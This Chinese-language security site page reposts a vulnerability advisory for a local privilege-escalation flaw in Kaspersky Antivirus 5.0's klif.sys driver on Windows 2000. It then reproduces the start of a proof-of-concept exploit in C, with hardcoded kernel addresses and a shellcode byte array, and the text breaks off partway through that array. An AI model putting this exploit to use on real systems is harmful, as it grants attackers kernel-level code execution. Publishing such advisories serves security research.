当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > Kaspersky杀毒软件klif.sys权限提升漏洞

安全基础
如何确保应用系统的安全
不再怕攻击 拨号上网必学的几招安全技巧
用微软工具MBSA了解电脑的“安全红线”
WinXP/2K鲜为人知的安全命令
用ISA+瑞星构筑防范黑客和病毒攻击的铜墙铁壁
思科警告用户注意IOS漏洞
Winzip存在多个缓冲区溢出漏洞
网络管理员必读之如何让DHCP服务器更安全
防范网页木马的攻击
Linux又出现高危险图像漏洞 厂商急于打补丁
三招两式保护Windows系统不受恶意代码攻击
三种对付恶意网站的绝招
绿盟评出2004年09月十大网络安全漏洞
Norton Internet Security 2005全面保护系统安全
解决IE强迫连接某网站的办法
浅析传统网络防火墙的五大不足之处
防范非法用户入侵Win 2000/XP系统七招
Microsoft 发布5个新的安全补丁
浅析三种不同的“防Ping”方法
Microsoft AntiSpyware微软出品的反间谍软件

安全基础 中的 Kaspersky杀毒软件klif.sys权限提升漏洞


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 61 ::
收藏到网摘: n/a

受影响系统:
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
描述:
------------------------------------------
BUGTRAQ  ID: _blank>13878

Kaspersky是一款非常流行的杀毒软件。

Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限,攻击者可能利用这个漏洞以系统内核的权限执行任意代码。

<*来源:Ilya Rabinovich ([email protected]
  
  链接:_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

测试方法:
------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,    //push 0x200
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address> - 0xBE938000
                    0x6A,0x00,                    //push 0  
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<GetModuleFileNameA> -> +13
                    0xFF,0xD0,                    //call eax
                    0x68,0x00,0x80,0x93,0xBE,    //push <buffer address>
                    0x68,0x00,0x82,0x93,0xBE,    //push <address of the notepad path>- 0xBE938200
                    0xB8,0x00,0x00,0x00,0x00,    //mov eax,<lstrcmpiA> -> +30
                    0xFF,0xD0,                    //call eax
                    0x85,0xC0,                    //test eax,eax
                    0x74,0x03,                    //je +03
                    0xC2,0x04,0x00,                //retn 4
                    0x6A,0x00,                    //pu